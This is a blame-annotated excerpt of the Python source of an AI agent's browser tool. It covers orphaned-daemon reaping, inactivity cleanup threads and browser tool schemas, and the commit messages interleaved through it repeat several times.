- Zero subprocesses; regression test asserts subprocess/Popen/time.sleep
never appear in the function source (skipping docstrings via AST).
## Validation
| | Before | After |
|------------------------------|---------------|--------------|
| Orphan agent-browser daemons | 18 accumulated| 2 (live) |
| paste.rs sleep interpreters | 15 accumulated| 0 |
| RSS reclaimed | - | ~2.7 GB |
| Targeted tests | - | 2253 pass |
E2E verified: alive-owner daemons NOT reaped; dead-owner daemons
SIGTERM'd and socket dirs cleaned; pending.json sweep deletes expired
entries without spawning subprocesses.
2026-04-17 18:46:30 -07:00
logger . debug ( " Orphan reap on exit failed: %s " , e )
2026-01-29 06:10:24 +00:00
2026-03-10 12:39:13 +03:00
# Register cleanup via atexit only. Previous versions installed SIGINT/SIGTERM
# handlers that called sys.exit(), but this conflicts with prompt_toolkit's
# async event loop — a SystemExit raised inside a key-binding callback
# corrupts the coroutine state and makes the process unkillable. atexit
# handlers run on any normal exit (including sys.exit), so browser sessions
# are still cleaned up without hijacking signals.
2026-01-29 06:10:24 +00:00
atexit . register ( _emergency_cleanup_all_sessions )
2026-01-31 21:42:15 -08:00
# =============================================================================
# Inactivity Cleanup Functions
# =============================================================================
def _cleanup_inactive_browser_sessions ( ) :
"""
Clean up browser sessions that have been inactive for longer than the timeout .
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
This function is called periodically by the background cleanup thread to
automatically close sessions that haven ' t been used recently, preventing
2026-03-07 01:14:57 -08:00
orphaned sessions ( local or Browserbase ) from accumulating .
2026-01-31 21:42:15 -08:00
"""
current_time = time . time ( )
sessions_to_cleanup = [ ]
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
with _cleanup_lock :
for task_id , last_time in list ( _session_last_activity . items ( ) ) :
if current_time - last_time > BROWSER_SESSION_INACTIVITY_TIMEOUT :
sessions_to_cleanup . append ( task_id )
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
for task_id in sessions_to_cleanup :
try :
2026-03-14 11:34:31 -07:00
elapsed = int ( current_time - _session_last_activity . get ( task_id , current_time ) )
logger . info ( " Cleaning up inactive session for task: %s (inactive for %s s) " , task_id , elapsed )
2026-01-31 21:42:15 -08:00
cleanup_browser ( task_id )
with _cleanup_lock :
if task_id in _session_last_activity :
del _session_last_activity [ task_id ]
except Exception as e :
2026-03-14 11:34:31 -07:00
logger . warning ( " Error cleaning up inactive session %s : %s " , task_id , e )
2026-01-31 21:42:15 -08:00
fix: two process leaks (agent-browser daemons, paste.rs sleepers) (#11843)
Both fixes close process leaks observed in production (18+ orphaned
agent-browser node daemons, 15+ orphaned paste.rs sleep interpreters
accumulated over ~3 days, ~2.7 GB RSS).
## agent-browser daemon leak
Previously the orphan reaper (_reap_orphaned_browser_sessions) only ran
from _start_browser_cleanup_thread, which is only invoked on the first
browser tool call in a process. Hermes sessions that never used the
browser never swept orphans, and the cross-process orphan detection
relied on in-process _active_sessions, which doesn't see other hermes
PIDs' sessions (race risk).
- Write <session>.owner_pid alongside the socket dir recording the
hermes PID that owns the daemon (extracted into _write_owner_pid for
direct testability).
- Reaper prefers owner_pid liveness over in-process _active_sessions.
Cross-process safe: concurrent hermes instances won't reap each
other's daemons. Legacy tracked_names fallback kept for daemons
that predate owner_pid.
- atexit handler (_emergency_cleanup_all_sessions) now always runs
the reaper, not just when this process had active sessions —
every clean hermes exit sweeps accumulated orphans.
## paste.rs auto-delete leak
_schedule_auto_delete spawned a detached Python subprocess per call
that slept 6 hours then issued DELETE requests. No dedup, no tracking —
every 'hermes debug share' invocation added ~20 MB of resident Python
interpreters that stuck around until the sleep finished.
- Replaced the spawn with ~/.hermes/pastes/pending.json: records
{url, expire_at} entries.
- _sweep_expired_pastes() synchronously DELETEs past-due entries on
every 'hermes debug' invocation (run_debug() dispatcher).
- Network failures stay in pending.json for up to 24h, then give up
(paste.rs's own retention handles the 'user never runs hermes again'
edge case).
- Zero subprocesses; regression test asserts subprocess/Popen/time.sleep
never appear in the function source (skipping docstrings via AST).
## Validation
| | Before | After |
|------------------------------|---------------|--------------|
| Orphan agent-browser daemons | 18 accumulated| 2 (live) |
| paste.rs sleep interpreters | 15 accumulated| 0 |
| RSS reclaimed | - | ~2.7 GB |
| Targeted tests | - | 2253 pass |
E2E verified: alive-owner daemons NOT reaped; dead-owner daemons
SIGTERM'd and socket dirs cleaned; pending.json sweep deletes expired
entries without spawning subprocesses.
2026-04-17 18:46:30 -07:00
def _write_owner_pid ( socket_dir : str , session_name : str ) - > None :
""" Record the current hermes PID as the owner of a browser socket dir.
Written atomically to ` ` < socket_dir > / < session_name > . owner_pid ` ` so the
orphan reaper can distinguish daemons owned by a live hermes process
( don ' t reap) from daemons whose owner crashed (reap). Best-effort —
an OSError here just falls back to the legacy ` ` tracked_names ` `
heuristic in the reaper .
"""
try :
path = os . path . join ( socket_dir , f " { session_name } .owner_pid " )
with open ( path , " w " ) as f :
f . write ( str ( os . getpid ( ) ) )
except OSError as exc :
logger . debug ( " Could not write owner_pid file for %s : %s " ,
session_name , exc )
2026-04-11 14:02:46 -07:00
def _reap_orphaned_browser_sessions ( ) :
""" Scan for orphaned agent-browser daemon processes from previous runs.
When the Python process that created a browser session exits uncleanly
( SIGKILL , crash , gateway restart ) , the in - memory ` ` _active_sessions ` `
tracking is lost but the node + Chromium processes keep running .
This function scans the tmp directory for ` ` agent - browser - * ` ` socket dirs
left behind by previous runs , reads the daemon PID files , and kills any
fix: two process leaks (agent-browser daemons, paste.rs sleepers) (#11843)
Both fixes close process leaks observed in production (18+ orphaned
agent-browser node daemons, 15+ orphaned paste.rs sleep interpreters
accumulated over ~3 days, ~2.7 GB RSS).
## agent-browser daemon leak
Previously the orphan reaper (_reap_orphaned_browser_sessions) only ran
from _start_browser_cleanup_thread, which is only invoked on the first
browser tool call in a process. Hermes sessions that never used the
browser never swept orphans, and the cross-process orphan detection
relied on in-process _active_sessions, which doesn't see other hermes
PIDs' sessions (race risk).
- Write <session>.owner_pid alongside the socket dir recording the
hermes PID that owns the daemon (extracted into _write_owner_pid for
direct testability).
- Reaper prefers owner_pid liveness over in-process _active_sessions.
Cross-process safe: concurrent hermes instances won't reap each
other's daemons. Legacy tracked_names fallback kept for daemons
that predate owner_pid.
- atexit handler (_emergency_cleanup_all_sessions) now always runs
the reaper, not just when this process had active sessions —
every clean hermes exit sweeps accumulated orphans.
## paste.rs auto-delete leak
_schedule_auto_delete spawned a detached Python subprocess per call
that slept 6 hours then issued DELETE requests. No dedup, no tracking —
every 'hermes debug share' invocation added ~20 MB of resident Python
interpreters that stuck around until the sleep finished.
- Replaced the spawn with ~/.hermes/pastes/pending.json: records
{url, expire_at} entries.
- _sweep_expired_pastes() synchronously DELETEs past-due entries on
every 'hermes debug' invocation (run_debug() dispatcher).
- Network failures stay in pending.json for up to 24h, then give up
(paste.rs's own retention handles the 'user never runs hermes again'
edge case).
- Zero subprocesses; regression test asserts subprocess/Popen/time.sleep
never appear in the function source (skipping docstrings via AST).
## Validation
| | Before | After |
|------------------------------|---------------|--------------|
| Orphan agent-browser daemons | 18 accumulated| 2 (live) |
| paste.rs sleep interpreters | 15 accumulated| 0 |
| RSS reclaimed | - | ~2.7 GB |
| Targeted tests | - | 2253 pass |
E2E verified: alive-owner daemons NOT reaped; dead-owner daemons
SIGTERM'd and socket dirs cleaned; pending.json sweep deletes expired
entries without spawning subprocesses.
2026-04-17 18:46:30 -07:00
daemons whose owning hermes process is no longer alive .
Ownership detection priority :
1. ` ` < session > . owner_pid ` ` file ( written by current code ) — if the
referenced hermes PID is alive , leave the daemon alone regardless
of whether it ' s in *this* process ' s ` ` _active_sessions ` ` . This is
cross - process safe : two concurrent hermes instances won ' t reap each
other ' s daemons.
2. Fallback for daemons that predate owner_pid : check
` ` _active_sessions ` ` in the current process . If not tracked here ,
treat as orphan ( legacy behavior ) .
Safe to call from any context — atexit , cleanup thread , or on demand .
2026-04-11 14:02:46 -07:00
"""
import glob
tmpdir = _socket_safe_tmpdir ( )
pattern = os . path . join ( tmpdir , " agent-browser-h_* " )
socket_dirs = glob . glob ( pattern )
# Also pick up CDP sessions
socket_dirs + = glob . glob ( os . path . join ( tmpdir , " agent-browser-cdp_* " ) )
2026-04-20 23:18:30 +08:00
# Also pick up cloud-provider sessions (browser-use/browserbase/firecrawl)
socket_dirs + = glob . glob ( os . path . join ( tmpdir , " agent-browser-hermes_* " ) )
2026-04-11 14:02:46 -07:00
if not socket_dirs :
return
fix: two process leaks (agent-browser daemons, paste.rs sleepers) (#11843)
Both fixes close process leaks observed in production (18+ orphaned
agent-browser node daemons, 15+ orphaned paste.rs sleep interpreters
accumulated over ~3 days, ~2.7 GB RSS).
## agent-browser daemon leak
Previously the orphan reaper (_reap_orphaned_browser_sessions) only ran
from _start_browser_cleanup_thread, which is only invoked on the first
browser tool call in a process. Hermes sessions that never used the
browser never swept orphans, and the cross-process orphan detection
relied on in-process _active_sessions, which doesn't see other hermes
PIDs' sessions (race risk).
- Write <session>.owner_pid alongside the socket dir recording the
hermes PID that owns the daemon (extracted into _write_owner_pid for
direct testability).
- Reaper prefers owner_pid liveness over in-process _active_sessions.
Cross-process safe: concurrent hermes instances won't reap each
other's daemons. Legacy tracked_names fallback kept for daemons
that predate owner_pid.
- atexit handler (_emergency_cleanup_all_sessions) now always runs
the reaper, not just when this process had active sessions —
every clean hermes exit sweeps accumulated orphans.
## paste.rs auto-delete leak
_schedule_auto_delete spawned a detached Python subprocess per call
that slept 6 hours then issued DELETE requests. No dedup, no tracking —
every 'hermes debug share' invocation added ~20 MB of resident Python
interpreters that stuck around until the sleep finished.
- Replaced the spawn with ~/.hermes/pastes/pending.json: records
{url, expire_at} entries.
- _sweep_expired_pastes() synchronously DELETEs past-due entries on
every 'hermes debug' invocation (run_debug() dispatcher).
- Network failures stay in pending.json for up to 24h, then give up
(paste.rs's own retention handles the 'user never runs hermes again'
edge case).
- Zero subprocesses; regression test asserts subprocess/Popen/time.sleep
never appear in the function source (skipping docstrings via AST).
## Validation
| | Before | After |
|------------------------------|---------------|--------------|
| Orphan agent-browser daemons | 18 accumulated| 2 (live) |
| paste.rs sleep interpreters | 15 accumulated| 0 |
| RSS reclaimed | - | ~2.7 GB |
| Targeted tests | - | 2253 pass |
E2E verified: alive-owner daemons NOT reaped; dead-owner daemons
SIGTERM'd and socket dirs cleaned; pending.json sweep deletes expired
entries without spawning subprocesses.
2026-04-17 18:46:30 -07:00
# Build set of session_names currently tracked by this process (fallback path)
2026-04-11 14:02:46 -07:00
with _cleanup_lock :
tracked_names = {
info . get ( " session_name " )
for info in _active_sessions . values ( )
if info . get ( " session_name " )
}
reaped = 0
for socket_dir in socket_dirs :
dir_name = os . path . basename ( socket_dir )
# dir_name is "agent-browser-{session_name}"
session_name = dir_name . removeprefix ( " agent-browser- " )
if not session_name :
continue
fix: two process leaks (agent-browser daemons, paste.rs sleepers) (#11843)
Both fixes close process leaks observed in production (18+ orphaned
agent-browser node daemons, 15+ orphaned paste.rs sleep interpreters
accumulated over ~3 days, ~2.7 GB RSS).
## agent-browser daemon leak
Previously the orphan reaper (_reap_orphaned_browser_sessions) only ran
from _start_browser_cleanup_thread, which is only invoked on the first
browser tool call in a process. Hermes sessions that never used the
browser never swept orphans, and the cross-process orphan detection
relied on in-process _active_sessions, which doesn't see other hermes
PIDs' sessions (race risk).
- Write <session>.owner_pid alongside the socket dir recording the
hermes PID that owns the daemon (extracted into _write_owner_pid for
direct testability).
- Reaper prefers owner_pid liveness over in-process _active_sessions.
Cross-process safe: concurrent hermes instances won't reap each
other's daemons. Legacy tracked_names fallback kept for daemons
that predate owner_pid.
- atexit handler (_emergency_cleanup_all_sessions) now always runs
the reaper, not just when this process had active sessions —
every clean hermes exit sweeps accumulated orphans.
## paste.rs auto-delete leak
_schedule_auto_delete spawned a detached Python subprocess per call
that slept 6 hours then issued DELETE requests. No dedup, no tracking —
every 'hermes debug share' invocation added ~20 MB of resident Python
interpreters that stuck around until the sleep finished.
- Replaced the spawn with ~/.hermes/pastes/pending.json: records
{url, expire_at} entries.
- _sweep_expired_pastes() synchronously DELETEs past-due entries on
every 'hermes debug' invocation (run_debug() dispatcher).
- Network failures stay in pending.json for up to 24h, then give up
(paste.rs's own retention handles the 'user never runs hermes again'
edge case).
- Zero subprocesses; regression test asserts subprocess/Popen/time.sleep
never appear in the function source (skipping docstrings via AST).
## Validation
| | Before | After |
|------------------------------|---------------|--------------|
| Orphan agent-browser daemons | 18 accumulated| 2 (live) |
| paste.rs sleep interpreters | 15 accumulated| 0 |
| RSS reclaimed | - | ~2.7 GB |
| Targeted tests | - | 2253 pass |
E2E verified: alive-owner daemons NOT reaped; dead-owner daemons
SIGTERM'd and socket dirs cleaned; pending.json sweep deletes expired
entries without spawning subprocesses.
2026-04-17 18:46:30 -07:00
# Ownership check: prefer owner_pid file (cross-process safe).
owner_pid_file = os . path . join ( socket_dir , f " { session_name } .owner_pid " )
owner_alive : Optional [ bool ] = None # None = owner_pid missing/unreadable
if os . path . isfile ( owner_pid_file ) :
try :
owner_pid = int ( Path ( owner_pid_file ) . read_text ( ) . strip ( ) )
try :
os . kill ( owner_pid , 0 )
owner_alive = True
except ProcessLookupError :
owner_alive = False
except PermissionError :
# Owner exists but we can't signal it (different uid).
# Treat as alive — don't reap someone else's session.
owner_alive = True
except ( ValueError , OSError ) :
owner_alive = None # corrupt file — fall through
if owner_alive is True :
# Owner is alive — this session belongs to a live hermes process.
2026-04-11 14:02:46 -07:00
continue
fix: two process leaks (agent-browser daemons, paste.rs sleepers) (#11843)
Both fixes close process leaks observed in production (18+ orphaned
agent-browser node daemons, 15+ orphaned paste.rs sleep interpreters
accumulated over ~3 days, ~2.7 GB RSS).
## agent-browser daemon leak
Previously the orphan reaper (_reap_orphaned_browser_sessions) only ran
from _start_browser_cleanup_thread, which is only invoked on the first
browser tool call in a process. Hermes sessions that never used the
browser never swept orphans, and the cross-process orphan detection
relied on in-process _active_sessions, which doesn't see other hermes
PIDs' sessions (race risk).
- Write <session>.owner_pid alongside the socket dir recording the
hermes PID that owns the daemon (extracted into _write_owner_pid for
direct testability).
- Reaper prefers owner_pid liveness over in-process _active_sessions.
Cross-process safe: concurrent hermes instances won't reap each
other's daemons. Legacy tracked_names fallback kept for daemons
that predate owner_pid.
- atexit handler (_emergency_cleanup_all_sessions) now always runs
the reaper, not just when this process had active sessions —
every clean hermes exit sweeps accumulated orphans.
## paste.rs auto-delete leak
_schedule_auto_delete spawned a detached Python subprocess per call
that slept 6 hours then issued DELETE requests. No dedup, no tracking —
every 'hermes debug share' invocation added ~20 MB of resident Python
interpreters that stuck around until the sleep finished.
- Replaced the spawn with ~/.hermes/pastes/pending.json: records
{url, expire_at} entries.
- _sweep_expired_pastes() synchronously DELETEs past-due entries on
every 'hermes debug' invocation (run_debug() dispatcher).
- Network failures stay in pending.json for up to 24h, then give up
(paste.rs's own retention handles the 'user never runs hermes again'
edge case).
- Zero subprocesses; regression test asserts subprocess/Popen/time.sleep
never appear in the function source (skipping docstrings via AST).
## Validation
| | Before | After |
|------------------------------|---------------|--------------|
| Orphan agent-browser daemons | 18 accumulated| 2 (live) |
| paste.rs sleep interpreters | 15 accumulated| 0 |
| RSS reclaimed | - | ~2.7 GB |
| Targeted tests | - | 2253 pass |
E2E verified: alive-owner daemons NOT reaped; dead-owner daemons
SIGTERM'd and socket dirs cleaned; pending.json sweep deletes expired
entries without spawning subprocesses.
2026-04-17 18:46:30 -07:00
if owner_alive is None :
# No owner_pid file (legacy daemon). Fall back to in-process
# tracking: if this process knows about the session, leave alone.
if session_name in tracked_names :
continue
# owner_alive is False (dead owner) OR legacy daemon not tracked here.
2026-04-11 14:02:46 -07:00
pid_file = os . path . join ( socket_dir , f " { session_name } .pid " )
if not os . path . isfile ( pid_file ) :
fix: two process leaks (agent-browser daemons, paste.rs sleepers) (#11843)
Both fixes close process leaks observed in production (18+ orphaned
agent-browser node daemons, 15+ orphaned paste.rs sleep interpreters
accumulated over ~3 days, ~2.7 GB RSS).
## agent-browser daemon leak
Previously the orphan reaper (_reap_orphaned_browser_sessions) only ran
from _start_browser_cleanup_thread, which is only invoked on the first
browser tool call in a process. Hermes sessions that never used the
browser never swept orphans, and the cross-process orphan detection
relied on in-process _active_sessions, which doesn't see other hermes
PIDs' sessions (race risk).
- Write <session>.owner_pid alongside the socket dir recording the
hermes PID that owns the daemon (extracted into _write_owner_pid for
direct testability).
- Reaper prefers owner_pid liveness over in-process _active_sessions.
Cross-process safe: concurrent hermes instances won't reap each
other's daemons. Legacy tracked_names fallback kept for daemons
that predate owner_pid.
- atexit handler (_emergency_cleanup_all_sessions) now always runs
the reaper, not just when this process had active sessions —
every clean hermes exit sweeps accumulated orphans.
## paste.rs auto-delete leak
_schedule_auto_delete spawned a detached Python subprocess per call
that slept 6 hours then issued DELETE requests. No dedup, no tracking —
every 'hermes debug share' invocation added ~20 MB of resident Python
interpreters that stuck around until the sleep finished.
- Replaced the spawn with ~/.hermes/pastes/pending.json: records
{url, expire_at} entries.
- _sweep_expired_pastes() synchronously DELETEs past-due entries on
every 'hermes debug' invocation (run_debug() dispatcher).
- Network failures stay in pending.json for up to 24h, then give up
(paste.rs's own retention handles the 'user never runs hermes again'
edge case).
- Zero subprocesses; regression test asserts subprocess/Popen/time.sleep
never appear in the function source (skipping docstrings via AST).
## Validation
| | Before | After |
|------------------------------|---------------|--------------|
| Orphan agent-browser daemons | 18 accumulated| 2 (live) |
| paste.rs sleep interpreters | 15 accumulated| 0 |
| RSS reclaimed | - | ~2.7 GB |
| Targeted tests | - | 2253 pass |
E2E verified: alive-owner daemons NOT reaped; dead-owner daemons
SIGTERM'd and socket dirs cleaned; pending.json sweep deletes expired
entries without spawning subprocesses.
2026-04-17 18:46:30 -07:00
# No daemon PID file — just a stale dir, remove it
2026-04-11 14:02:46 -07:00
shutil . rmtree ( socket_dir , ignore_errors = True )
continue
try :
daemon_pid = int ( Path ( pid_file ) . read_text ( ) . strip ( ) )
except ( ValueError , OSError ) :
shutil . rmtree ( socket_dir , ignore_errors = True )
continue
# Check if the daemon is still alive
try :
os . kill ( daemon_pid , 0 ) # signal 0 = existence check
except ProcessLookupError :
# Already dead, just clean up the dir
shutil . rmtree ( socket_dir , ignore_errors = True )
continue
except PermissionError :
# Alive but owned by someone else — leave it alone
continue
fix: two process leaks (agent-browser daemons, paste.rs sleepers) (#11843)
Both fixes close process leaks observed in production (18+ orphaned
agent-browser node daemons, 15+ orphaned paste.rs sleep interpreters
accumulated over ~3 days, ~2.7 GB RSS).
## agent-browser daemon leak
Previously the orphan reaper (_reap_orphaned_browser_sessions) only ran
from _start_browser_cleanup_thread, which is only invoked on the first
browser tool call in a process. Hermes sessions that never used the
browser never swept orphans, and the cross-process orphan detection
relied on in-process _active_sessions, which doesn't see other hermes
PIDs' sessions (race risk).
- Write <session>.owner_pid alongside the socket dir recording the
hermes PID that owns the daemon (extracted into _write_owner_pid for
direct testability).
- Reaper prefers owner_pid liveness over in-process _active_sessions.
Cross-process safe: concurrent hermes instances won't reap each
other's daemons. Legacy tracked_names fallback kept for daemons
that predate owner_pid.
- atexit handler (_emergency_cleanup_all_sessions) now always runs
the reaper, not just when this process had active sessions —
every clean hermes exit sweeps accumulated orphans.
## paste.rs auto-delete leak
_schedule_auto_delete spawned a detached Python subprocess per call
that slept 6 hours then issued DELETE requests. No dedup, no tracking —
every 'hermes debug share' invocation added ~20 MB of resident Python
interpreters that stuck around until the sleep finished.
- Replaced the spawn with ~/.hermes/pastes/pending.json: records
{url, expire_at} entries.
- _sweep_expired_pastes() synchronously DELETEs past-due entries on
every 'hermes debug' invocation (run_debug() dispatcher).
- Network failures stay in pending.json for up to 24h, then give up
(paste.rs's own retention handles the 'user never runs hermes again'
edge case).
- Zero subprocesses; regression test asserts subprocess/Popen/time.sleep
never appear in the function source (skipping docstrings via AST).
## Validation
| | Before | After |
|------------------------------|---------------|--------------|
| Orphan agent-browser daemons | 18 accumulated| 2 (live) |
| paste.rs sleep interpreters | 15 accumulated| 0 |
| RSS reclaimed | - | ~2.7 GB |
| Targeted tests | - | 2253 pass |
E2E verified: alive-owner daemons NOT reaped; dead-owner daemons
SIGTERM'd and socket dirs cleaned; pending.json sweep deletes expired
entries without spawning subprocesses.
2026-04-17 18:46:30 -07:00
# Daemon is alive and its owner is dead (or legacy + untracked). Reap.
2026-04-11 14:02:46 -07:00
try :
os . kill ( daemon_pid , signal . SIGTERM )
logger . info ( " Reaped orphaned browser daemon PID %d (session %s ) " ,
daemon_pid , session_name )
reaped + = 1
except ( ProcessLookupError , PermissionError , OSError ) :
pass
# Clean up the socket directory
shutil . rmtree ( socket_dir , ignore_errors = True )
if reaped :
logger . info ( " Reaped %d orphaned browser session(s) from previous run(s) " , reaped )
2026-01-31 21:42:15 -08:00
def _browser_cleanup_thread_worker ( ) :
"""
Background thread that periodically cleans up inactive browser sessions .
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
Runs every 30 seconds and checks for sessions that haven ' t been used
within the BROWSER_SESSION_INACTIVITY_TIMEOUT period .
2026-04-11 14:02:46 -07:00
On first run , also reaps orphaned sessions from previous process lifetimes .
2026-01-31 21:42:15 -08:00
"""
2026-04-11 14:02:46 -07:00
# One-time orphan reap on startup
try :
_reap_orphaned_browser_sessions ( )
except Exception as e :
logger . warning ( " Orphan reap error: %s " , e )
2026-01-31 21:42:15 -08:00
while _cleanup_running :
try :
_cleanup_inactive_browser_sessions ( )
except Exception as e :
2026-02-21 03:11:11 -08:00
logger . warning ( " Cleanup thread error: %s " , e )
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
# Sleep in 1-second intervals so we can stop quickly if needed
for _ in range ( 30 ) :
if not _cleanup_running :
break
time . sleep ( 1 )
def _start_browser_cleanup_thread ( ) :
""" Start the background cleanup thread if not already running. """
global _cleanup_thread , _cleanup_running
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
with _cleanup_lock :
if _cleanup_thread is None or not _cleanup_thread . is_alive ( ) :
_cleanup_running = True
_cleanup_thread = threading . Thread (
target = _browser_cleanup_thread_worker ,
daemon = True ,
name = " browser-cleanup "
)
_cleanup_thread . start ( )
2026-03-14 11:34:31 -07:00
logger . info ( " Started inactivity cleanup thread (timeout: %s s) " , BROWSER_SESSION_INACTIVITY_TIMEOUT )
2026-01-31 21:42:15 -08:00
def _stop_browser_cleanup_thread ( ) :
""" Stop the background cleanup thread. """
global _cleanup_running
_cleanup_running = False
if _cleanup_thread is not None :
_cleanup_thread . join ( timeout = 5 )
def _update_session_activity ( task_id : str ) :
""" Update the last activity timestamp for a session. """
with _cleanup_lock :
_session_last_activity [ task_id ] = time . time ( )
# Register cleanup thread stop on exit
atexit . register ( _stop_browser_cleanup_thread )
2026-01-29 06:10:24 +00:00
# ============================================================================
# Tool Schemas
# ============================================================================
BROWSER_TOOL_SCHEMAS = [
{
" name " : " browser_navigate " ,
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
" description " : " Navigate to a URL in the browser. Initializes the session and loads the page. Must be called before other browser tools. For simple information retrieval, prefer web_search or web_extract (faster, cheaper). Use browser tools when you need to interact with a page (click, fill forms, dynamic content). Returns a compact page snapshot with interactive elements and ref IDs — no need to call browser_snapshot separately after navigating. " ,
2026-01-29 06:10:24 +00:00
" parameters " : {
" type " : " object " ,
" properties " : {
" url " : {
" type " : " string " ,
" description " : " The URL to navigate to (e.g., ' https://example.com ' ) "
}
} ,
" required " : [ " url " ]
}
} ,
{
" name " : " browser_snapshot " ,
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
" description " : " Get a text-based snapshot of the current page ' s accessibility tree. Returns interactive elements with ref IDs (like @e1, @e2) for browser_click and browser_type. full=false (default): compact view with interactive elements. full=true: complete page content. Snapshots over 8000 chars are truncated or LLM-summarized. Requires browser_navigate first. Note: browser_navigate already returns a compact snapshot — use this to refresh after interactions that change the page, or with full=true for complete content. " ,
2026-01-29 06:10:24 +00:00
" parameters " : {
" type " : " object " ,
" properties " : {
" full " : {
" type " : " boolean " ,
" description " : " If true, returns complete page content. If false (default), returns compact view with interactive elements only. " ,
" default " : False
}
} ,
" required " : [ ]
}
} ,
{
" name " : " browser_click " ,
" description " : " Click on an element identified by its ref ID from the snapshot (e.g., ' @e5 ' ). The ref IDs are shown in square brackets in the snapshot output. Requires browser_navigate and browser_snapshot to be called first. " ,
" parameters " : {
" type " : " object " ,
" properties " : {
" ref " : {
" type " : " string " ,
